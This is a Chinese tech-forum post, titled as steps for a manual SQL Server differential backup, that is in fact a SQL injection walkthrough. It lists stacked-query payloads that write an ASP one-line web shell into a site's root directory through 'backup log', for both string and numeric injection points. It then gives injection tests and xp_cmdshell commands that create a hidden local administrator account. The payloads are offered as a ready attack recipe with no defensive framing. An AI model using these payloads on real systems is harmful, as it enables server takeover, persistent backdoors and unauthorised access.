• 售前

  • 售后

热门帖子
入门百科

sqlserver 手工实现差异备份的步骤

[复制链接]
雪域蓝眸蓝nz 显示全部楼层 发表于 2021-10-26 13:13:24 |阅读模式 打印 上一主题 下一主题
手工实现差别备份的步骤
字符型:
1、恢复当前库
;alter database 当前库 set RECOVERY FULL--
2、建表cmd
;create table cmd (a image)--
3、备份当前库到D:\cmd1
;backup log 当前库 to disk = 'D:\cmd1' with init--
4、插入一句话代码到创建的表cmd
;insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、备份一句话代码到站点根目录
;backup log 当前库 to disk = 'D:\www_web\oct.asp'--
6、完成
;drop table 创建的表--
数字型
1、恢复当前库
';alter database 当前库 set RECOVERY FULL--
2、创建表cmd
';create table cmd (a image)--
3、备份当前库到D:\cmd1
';backup log 当前库 to disk = 'D:\cmd1' with init--
4、插入一句话代码到创建的表cmd
';insert into cmd (a) values ('<%%25**ecute(request("a"))%%25>')--
5、备份一句话代码到站点根目录
';backup log 当前库 to disk = 'D:\www_web\oct.asp'--
6、完成
';drop table 创建的表--
sa权限创建管理员用户
1、判断是否有注入;and 1=1 ;and 1=2  
;and user_name()='dbo' 判断当前体系的连接用户是不是sa
2、添加体系的管理员
;exec master.dbo.xp_cmdshell 'net user wk wk90/add';--
;exec master.dbo.xp_cmdshell 'net localgroup administrators wk /add';--
清闲复仇:有工具我是肯定不会手工的,麻烦。

帖子地址: 

回复

使用道具 举报

分享
推广
火星云矿 | 预约S19Pro,享500抵1000!
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

草根技术分享(草根吧)是全球知名中文IT技术交流平台,创建于2021年,包含原创博客、精品问答、职业培训、技术社区、资源下载等产品服务,提供原创、优质、完整内容的专业IT技术开发社区。
  • 官方手机版

  • 微信公众号

  • 商务合作